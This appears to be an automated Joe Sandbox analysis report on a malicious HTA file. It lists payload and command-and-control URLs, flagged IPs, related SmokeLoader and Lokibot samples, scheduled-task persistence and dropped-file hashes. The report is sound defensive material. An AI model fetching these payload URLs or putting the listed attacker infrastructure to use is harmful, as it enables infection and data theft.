                                                                                                                                                                  https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-dexplorer.exe, 0000000E.00000002.3014261792.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.2147790112.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    http://107.172.44.178/53/seemybestnetworkwhichgivebestthingsentirelifewithme.tIF9powershell.exe, 00000001.00000002.1954134272.0000000007290000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                    unknown
                                                                                                                                                                    http://prolinice.ga/index.phpMozilla/5.0explorer.exe, 00000011.00000002.2435370827.00000000031D0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.2391356204.0000000000538000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.2397253387.0000000000767000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3007335205.0000000003337000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.2660889863.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.3008863244.0000000002EB7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.3007619129.0000000000A48000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.3008824207.00000000031F7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.3007631723.0000000000C38000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                    unknown
                                                                                                                                                                    https://outlook.com_explorer.exe, 0000000E.00000000.2158219797.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3025073202.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=explorer.exe, 00000011.00000003.2404033488.000000000322E000.00000004.00000020.00020000.00000000.sdmp, 3D75.tmp.17.drfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-darkexplorer.exe, 0000000E.00000002.3014261792.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.2147790112.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                          high
                                                                                                                                                                          https://www.msn.com:443/en-us/feedexplorer.exe, 0000000E.00000002.3014261792.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.2147790112.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                            high
                                                                                                                                                                            https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppeexplorer.exe, 0000000E.00000002.3014261792.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.2147790112.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                              high
                                                                                                                                                                              https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-atexplorer.exe, 0000000E.00000002.3014261792.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.2147790112.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                high
                                                                                                                                                                                https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-ofexplorer.exe, 0000000E.00000002.3014261792.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.2147790112.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  • No. of IPs < 25%
                                                                                                                                                                                  • 25% < No. of IPs < 50%
                                                                                                                                                                                  • 50% < No. of IPs < 75%
                                                                                                                                                                                  • 75% < No. of IPs
                                                                                                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                  46.173.214.24
                                                                                                                                                                                  prolinice.gaRussian Federation
                                                                                                                                                                                  47196GARANT-PARK-INTERNETRUtrue
                                                                                                                                                                                  142.215.209.78
                                                                                                                                                                                  ip.1017.filemail.comCanada
                                                                                                                                                                                  32156HUMBER-COLLEGECAfalse
                                                                                                                                                                                  107.172.44.178
                                                                                                                                                                                  unknownUnited States
                                                                                                                                                                                  36352AS-COLOCROSSINGUStrue
                                                                                                                                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                  Analysis ID:1557927
                                                                                                                                                                                  Start date and time:2024-11-18 18:36:09 +01:00
                                                                                                                                                                                  Joe Sandbox product:CloudBasic
                                                                                                                                                                                  Overall analysis duration:0h 9m 0s
                                                                                                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                                                                                                  Report type:full
                                                                                                                                                                                  Cookbook file name:default.jbs
                                                                                                                                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                  Number of analysed new started processes analysed:29
                                                                                                                                                                                  Number of new started drivers analysed:0
                                                                                                                                                                                  Number of existing processes analysed:0
                                                                                                                                                                                  Number of existing drivers analysed:0
                                                                                                                                                                                  Number of injected processes analysed:1
                                                                                                                                                                                  Technologies:
                                                                                                                                                                                  • HCA enabled
                                                                                                                                                                                  • EGA enabled
                                                                                                                                                                                  • AMSI enabled
                                                                                                                                                                                  Analysis Mode:default
                                                                                                                                                                                  Analysis stop reason:Timeout
                                                                                                                                                                                  Sample name:bestthingsalwaysgetbesrentirelifethingstogdomybetterthignswithgreat.hta
                                                                                                                                                                                  Detection:MAL
                                                                                                                                                                                  Classification:mal100.phis.bank.troj.spyw.expl.evad.winHTA@41/36@2/3
                                                                                                                                                                                  EGA Information:
                                                                                                                                                                                  • Successful, ratio: 70.6%
                                                                                                                                                                                  HCA Information:
                                                                                                                                                                                  • Successful, ratio: 97%
                                                                                                                                                                                  • Number of executed functions: 177
                                                                                                                                                                                  • Number of non-executed functions: 90
                                                                                                                                                                                  Cookbook Comments:
                                                                                                                                                                                  • Found application associated with file extension: .hta
                                                                                                                                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                                                                                  • Excluded IPs from analysis (whitelisted): 13.89.179.12
                                                                                                                                                                                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, login.live.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, onedsblobprdcus17.centralus.cloudapp.azure.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                  • Execution Graph export aborted for target djvbaae, PID 3052 because it is empty
                                                                                                                                                                                  • Execution Graph export aborted for target mshta.exe, PID 6736 because there are no executed function
                                                                                                                                                                                  • Execution Graph export aborted for target powershell.exe, PID 5592 because it is empty
                                                                                                                                                                                  • Execution Graph export aborted for target powershell.exe, PID 6036 because it is empty
                                                                                                                                                                                  • Execution Graph export aborted for target powershell.exe, PID 6168 because it is empty
                                                                                                                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                  • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                                                                  • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                                                                                  • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                  • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                  • VT rate limit hit for: bestthingsalwaysgetbesrentirelifethingstogdomybetterthignswithgreat.hta
                                                                                                                                                                                  TimeTypeDescription
                                                                                                                                                                                  12:37:12API Interceptor109x Sleep call for process: powershell.exe modified
                                                                                                                                                                                  12:37:49API Interceptor24352x Sleep call for process: explorer.exe modified
                                                                                                                                                                                  12:38:38API Interceptor1x Sleep call for process: WerFault.exe modified
                                                                                                                                                                                  17:38:07Task SchedulerRun new task: Firefox Default Browser Agent 999F9F20696B12F1 path: C:\Users\user\AppData\Roaming\djvbaae
                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                  46.173.214.24#U3010TW-S PO#U3011PO#3311-20241118003.xlsGet hashmaliciousHTMLPhisher, SmokeLoaderBrowse
                                                                                                                                                                                  • prolinice.ga/index.php
                                                                                                                                                                                  142.215.209.78#U3010TW-S PO#U3011PO#3311-20241118003.xlsGet hashmaliciousHTMLPhisher, SmokeLoaderBrowse
                                                                                                                                                                                    seethebestthingswhichhappenedentiretimewithgreattimebacktohere.htaGet hashmaliciousCobalt Strike, Remcos, HTMLPhisherBrowse
                                                                                                                                                                                      Order_Summary.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                                                                                                                                        kissmegoodthingwhichgivemebestthignswithgirluaremy.htaGet hashmaliciousCobalt Strike, HTMLPhisher, LokibotBrowse
                                                                                                                                                                                          bestgirlfriendwhowintheheartwithentirelifegivenubestthigns.htaGet hashmaliciousCobalt Strike, HTMLPhisher, Lokibot, Strela StealerBrowse
                                                                                                                                                                                            Purchase order (1).xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                                                                                                                                              Purchase order (2).xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                                                                                                                                                SAMPLE_PHOTO.jsGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                  Document.xla.xlsxGet hashmaliciousFormBook, HTMLPhisherBrowse
                                                                                                                                                                                                    INQ02010391.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                      107.172.44.178#U3010TW-S PO#U3011PO#3311-20241118003.xlsGet hashmaliciousHTMLPhisher, SmokeLoaderBrowse
                                                                                                                                                                                                      • 107.172.44.178/53/WRFFRGT.txt
                                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                      ip.1017.filemail.com#U3010TW-S PO#U3011PO#3311-20241118003.xlsGet hashmaliciousHTMLPhisher, SmokeLoaderBrowse
                                                                                                                                                                                                      • 142.215.209.78
                                                                                                                                                                                                      seethebestthingswhichhappenedentiretimewithgreattimebacktohere.htaGet hashmaliciousCobalt Strike, Remcos, HTMLPhisherBrowse
                                                                                                                                                                                                      • 142.215.209.78
                                                                                                                                                                                                      Order_Summary.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                                                                                                                                                      • 142.215.209.78
                                                                                                                                                                                                      kissmegoodthingwhichgivemebestthignswithgirluaremy.htaGet hashmaliciousCobalt Strike, HTMLPhisher, LokibotBrowse
                                                                                                                                                                                                      • 142.215.209.78
                                                                                                                                                                                                      bestgirlfriendwhowintheheartwithentirelifegivenubestthigns.htaGet hashmaliciousCobalt Strike, HTMLPhisher, Lokibot, Strela StealerBrowse
                                                                                                                                                                                                      • 142.215.209.78
                                                                                                                                                                                                      Purchase order (1).xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                                                                                                                                                      • 142.215.209.78
                                                                                                                                                                                                      Purchase order (2).xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                                                                                                                                                      • 142.215.209.78
                                                                                                                                                                                                      SAMPLE_PHOTO.jsGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                      • 142.215.209.78
                                                                                                                                                                                                      Document.xla.xlsxGet hashmaliciousFormBook, HTMLPhisherBrowse
                                                                                                                                                                                                      • 142.215.209.78
                                                                                                                                                                                                      INQ02010391.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                      • 142.215.209.78
                                                                                                                                                                                                      prolinice.ga#U3010TW-S PO#U3011PO#3311-20241118003.xlsGet hashmaliciousHTMLPhisher, SmokeLoaderBrowse
                                                                                                                                                                                                      • 46.173.214.24
                                                                                                                                                                                                      veryeasythingsevermadeforcreatenewthignsbetterthigns.htaGet hashmaliciousCobalt Strike, SmokeLoaderBrowse
                                                                                                                                                                                                      • 45.91.8.152
                                                                                                                                                                                                      SecuriteInfo.com.Exploit.CVE-2017-11882.123.12869.5405.rtfGet hashmaliciousSmokeLoaderBrowse
                                                                                                                                                                                                      • 185.251.91.119
                                                                                                                                                                                                      40830001.xlsGet hashmaliciousSmokeLoaderBrowse
                                                                                                                                                                                                      • 185.251.91.119
                                                                                                                                                                                                      #20240627_Edlen_B.xlsGet hashmaliciousSmokeLoaderBrowse
                                                                                                                                                                                                      • 77.232.129.190
                                                                                                                                                                                                      171687721070698e62c2170d003b444ecf0c5f6af81f98e26a56198e118930566be818fe52443.dat-decoded.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                                                                                                      • 77.232.129.190
                                                                                                                                                                                                      #20240627_Edlen_A.xlsGet hashmaliciousSmokeLoaderBrowse
                                                                                                                                                                                                      • 77.232.129.190
                                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                      HUMBER-COLLEGECA#U3010TW-S PO#U3011PO#3311-20241118003.xlsGet hashmaliciousHTMLPhisher, SmokeLoaderBrowse
                                                                                                                                                                                                      • 142.215.209.78
                                                                                                                                                                                                      seethebestthingswhichhappenedentiretimewithgreattimebacktohere.htaGet hashmaliciousCobalt Strike, Remcos, HTMLPhisherBrowse
                                                                                                                                                                                                      • 142.215.209.78
                                                                                                                                                                                                      Order_Summary.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                                                                                                                                                      • 142.215.209.78
                                                                                                                                                                                                      kissmegoodthingwhichgivemebestthignswithgirluaremy.htaGet hashmaliciousCobalt Strike, HTMLPhisher, LokibotBrowse
                                                                                                                                                                                                      • 142.215.209.78
                                                                                                                                                                                                      bestgirlfriendwhowintheheartwithentirelifegivenubestthigns.htaGet hashmaliciousCobalt Strike, HTMLPhisher, Lokibot, Strela StealerBrowse
                                                                                                                                                                                                      • 142.215.209.78
                                                                                                                                                                                                      Purchase order (1).xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                                                                                                                                                      • 142.215.209.78
                                                                                                                                                                                                      Purchase order (2).xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                                                                                                                                                      • 142.215.209.78
                                                                                                                                                                                                      SAMPLE_PHOTO.jsGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                      • 142.215.209.78
                                                                                                                                                                                                      Document.xla.xlsxGet hashmaliciousFormBook, HTMLPhisherBrowse
                                                                                                                                                                                                      • 142.215.209.78
                                                                                                                                                                                                      INQ02010391.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                      • 142.215.209.78
                                                                                                                                                                                                      GARANT-PARK-INTERNETRU#U3010TW-S PO#U3011PO#3311-20241118003.xlsGet hashmaliciousHTMLPhisher, SmokeLoaderBrowse
                                                                                                                                                                                                      • 46.173.214.24
                                                                                                                                                                                                      0HUxKfIvSV.exeGet hashmaliciousClipboard HijackerBrowse
                                                                                                                                                                                                      • 46.173.214.92
                                                                                                                                                                                                      0HUxKfIvSV.exeGet hashmaliciousClipboard HijackerBrowse
                                                                                                                                                                                                      • 46.173.214.92
                                                                                                                                                                                                      9xNI7vE1XO.exeGet hashmaliciousClipboard HijackerBrowse
                                                                                                                                                                                                      • 46.173.214.92
                                                                                                                                                                                                      9xNI7vE1XO.exeGet hashmaliciousClipboard HijackerBrowse
                                                                                                                                                                                                      • 46.173.214.92
                                                                                                                                                                                                      bacon.exeGet hashmaliciousCobaltStrikeBrowse
                                                                                                                                                                                                      • 46.173.214.102
                                                                                                                                                                                                      UfRKIdsNvD.exeGet hashmaliciousClipboard HijackerBrowse
                                                                                                                                                                                                      • 46.173.214.92
                                                                                                                                                                                                      file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RedLine, Stealc, VidarBrowse
                                                                                                                                                                                                      • 46.173.214.86
                                                                                                                                                                                                      Lisect_AVT_24003_G1B_122.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                      • 46.173.211.166
                                                                                                                                                                                                      OYSVIdqcxa.exeGet hashmaliciousGlupteba, LummaC Stealer, RedLine, SmokeLoader, zgRATBrowse
                                                                                                                                                                                                      • 91.203.193.134
                                                                                                                                                                                                      AS-COLOCROSSINGUS#U3010TW-S PO#U3011PO#3311-20241118003.xlsGet hashmaliciousHTMLPhisher, SmokeLoaderBrowse
                                                                                                                                                                                                      • 107.172.44.178
                                                                                                                                                                                                      Payment Advice.xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                                                                                                                                                      • 192.3.243.136
                                                                                                                                                                                                      Payment Advice.xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                                                                                                                                                      • 192.3.243.136
                                                                                                                                                                                                      seethebestthingswhichhappenedentiretimewithgreattimebacktohere.htaGet hashmaliciousCobalt Strike, Remcos, HTMLPhisherBrowse
                                                                                                                                                                                                      • 192.227.228.36
                                                                                                                                                                                                      FRSSDE.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                      • 192.227.228.36
                                                                                                                                                                                                      Order_Summary.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                                                                                                                                                      • 192.227.228.36
                                                                                                                                                                                                      kissmegoodthingwhichgivemebestthignswithgirluaremy.htaGet hashmaliciousCobalt Strike, HTMLPhisher, LokibotBrowse
                                                                                                                                                                                                      • 192.3.243.136
                                                                                                                                                                                                      bestgirlfriendwhowintheheartwithentirelifegivenubestthigns.htaGet hashmaliciousCobalt Strike, HTMLPhisher, Lokibot, Strela StealerBrowse
                                                                                                                                                                                                      • 192.3.243.136
                                                                                                                                                                                                      Signert kontrakt og faktura.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                      • 107.173.4.61
                                                                                                                                                                                                      New order.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                      • 192.3.220.29
                                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                      3b5074b1b5d032e5620f69f9f700ff0eP.O 423737.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                                                      • 142.215.209.78
                                                                                                                                                                                                      Fluor RFQ1475#U00b7pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                                                      • 142.215.209.78
                                                                                                                                                                                                      Statement_of_account.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                                                      • 142.215.209.78
                                                                                                                                                                                                      QUOTATION_NOVQTRA071244PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                                                      • 142.215.209.78
                                                                                                                                                                                                      NoteID [4962398] _Secure_Document_Mrettinger-46568.docxGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                      • 142.215.209.78
                                                                                                                                                                                                      DRP130636747.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                      • 142.215.209.78
                                                                                                                                                                                                      seethebestthingswhichhappenedentiretimewithgreattimebacktohere.htaGet hashmaliciousCobalt Strike, Remcos, HTMLPhisherBrowse
                                                                                                                                                                                                      • 142.215.209.78
                                                                                                                                                                                                      z30ProofofPaymentAttached.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                      • 142.215.209.78
                                                                                                                                                                                                      Order88983273293729387293828PDF.exeGet hashmaliciousQuasarBrowse
                                                                                                                                                                                                      • 142.215.209.78
                                                                                                                                                                                                      https://www.figma.com/files/team/1440352672505295724/recents-and-sharing?fuid=1440352668792061854Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                      • 142.215.209.78
                                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                      C:\Users\user\AppData\Roaming\djvbaaekissmegoodthingwhichgivemebestthignswithgirluaremy.htaGet hashmaliciousCobalt Strike, HTMLPhisher, LokibotBrowse
                                                                                                                                                                                                        bestgirlfriendwhowintheheartwithentirelifegivenubestthigns.htaGet hashmaliciousCobalt Strike, HTMLPhisher, Lokibot, Strela StealerBrowse
                                                                                                                                                                                                          invoice727282_PDF..exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                            #U0410#U0433#U0440#U043e-#U0410#U043b#U044c#U044f#U043d#U0441_(PO_460387320)_pdf.vbsGet hashmaliciousLokibot, PureLog Stealer, zgRATBrowse
                                                                                                                                                                                                              6038732).vbsGet hashmaliciousLokibotBrowse
                                                                                                                                                                                                                cirby0J3LP.exeGet hashmaliciousAsyncRAT, PureLog Stealer, XWorm, zgRATBrowse
                                                                                                                                                                                                                  SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exeGet hashmaliciousPureLog Stealer, XWormBrowse
                                                                                                                                                                                                                    SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exeGet hashmaliciousPureLog Stealer, XWormBrowse
                                                                                                                                                                                                                      3vj5tYFb6a.exeGet hashmaliciousSnake Keylogger, zgRATBrowse
                                                                                                                                                                                                                        50000PCSPIC12F1501-ESN.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                          Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):65536
                                                                                                                                                                                                                          Entropy (8bit):0.9429489199670955
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:192:W9woXeC6sQ0LZTkrjyaVwzuiF2Z24lO8k:1oOCJrLZTWjKzuiF2Y4lO8k
                                                                                                                                                                                                                          MD5:D145220501D0074227609A67FD40E221
                                                                                                                                                                                                                          SHA1:A0DE9104F90EF13BAD93A2B9F8C9B5ABCA7237A5
                                                                                                                                                                                                                          SHA-256:0BD07D47A538F4DA22C83F0EA6D3CE65C4063500C5E57DC41FE357461B4614A6
                                                                                                                                                                                                                          SHA-512:074918A7A4EA61D8A4F0025A53B12BBAA32C9A61B0AC9F1391099875ABA98246CE32E775BD8E3A45F05B4D58567764146B1484B2B8EAC77282FD85701442A4B7
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.6.4.2.5.0.9.7.3.9.2.3.8.6.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.6.4.2.5.0.9.8.3.4.5.5.0.9.8.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.a.9.7.e.8.1.9.-.8.2.1.9.-.4.6.d.f.-.9.a.7.7.-.9.3.e.a.3.c.1.6.a.6.2.d.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.c.d.3.7.f.4.0.-.8.6.e.9.-.4.0.b.2.-.b.2.3.f.-.e.7.d.9.2.8.0.c.b.e.6.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.e.x.p.l.o.r.e.r...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.E.X.P.L.O.R.E.R...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.d.9.c.-.0.0.0.1.-.0.0.1.4.-.8.9.d.3.-.d.a.a.4.e.0.3.9.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.9.0.b.0.8.0.e.0.6.5.5.7.2.0.c.a.d.8.c.1.c.a.e.4.b.8.1.9.3.c.9.3.8.2.c.9.a.c.9.2.!.e.x.p.l.o.r.e.r...e.x.e.
                                                                                                                                                                                                                          Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                          File Type:Mini DuMP crash report, 14 streams, Mon Nov 18 17:38:17 2024, 0x1205a4 type
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):58966
                                                                                                                                                                                                                          Entropy (8bit):1.5430466762082595
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:192:g/yDybE7RGMoO2pxdsNbx9B1WjPRDQvlGYb1Y:I4yA7bubshx9B1Wmv7pY
                                                                                                                                                                                                                          MD5:48967CF654232BACDF869DD3BB67C4E0
                                                                                                                                                                                                                          SHA1:AAD6FF03EE234202AB2C4F5E1142B8D0DD511D29
                                                                                                                                                                                                                          SHA-256:72B37C97404821BB9D9B7AF1C7157652B3BF29D623B3E2FB236964E0A0A807D2
                                                                                                                                                                                                                          SHA-512:4C38B97AFFBB0E8E825CAAA0EF53E37D0104AFC615948DA22F18A991F5A9BEA728F7FC74CF07F87A95915BFC1FE716575DC64F1927393DC58CF4693B440461E8
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Preview:MDMP..a..... ........{;g.........................................7..........T.......8...........T...........0...&...........L...........8...............................................................................eJ..............Lw......................T............{;g............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                          Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):8560
                                                                                                                                                                                                                          Entropy (8bit):3.695576961050474
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:192:R6l7wVeJx70p6Y9Sq8gmfqtjb0pDy89bcA4fsq0m:R6lXJdy6YIq8gmfqtj+cffZ
                                                                                                                                                                                                                          MD5:A32F13589E88B88F43DB8A6D51CE3BEA
                                                                                                                                                                                                                          SHA1:C9FFA4359D51319CE2D12F3E0FD0F09A69815FE9
                                                                                                                                                                                                                          SHA-256:8AA2C26F9F2B25A9F1A25762B5427A9F56FA34FB38D803538ED162D5657C536F
                                                                                                                                                                                                                          SHA-512:3BB8C4A6AEC5DE87A6704F57085FAD4E7DEA63B476DD34442E1357E4DFF1823D16F862C839195E6C352AC71E3F0BDAA64DA827D8316B3E76D16E4E81B42FD79D
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.4.8.4.<./.P.i.
                                                                                                                                                                                                                          Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):4719
                                                                                                                                                                                                                          Entropy (8bit):4.452107755392488
                                                                                                                                                                                                                          Encrypted:false
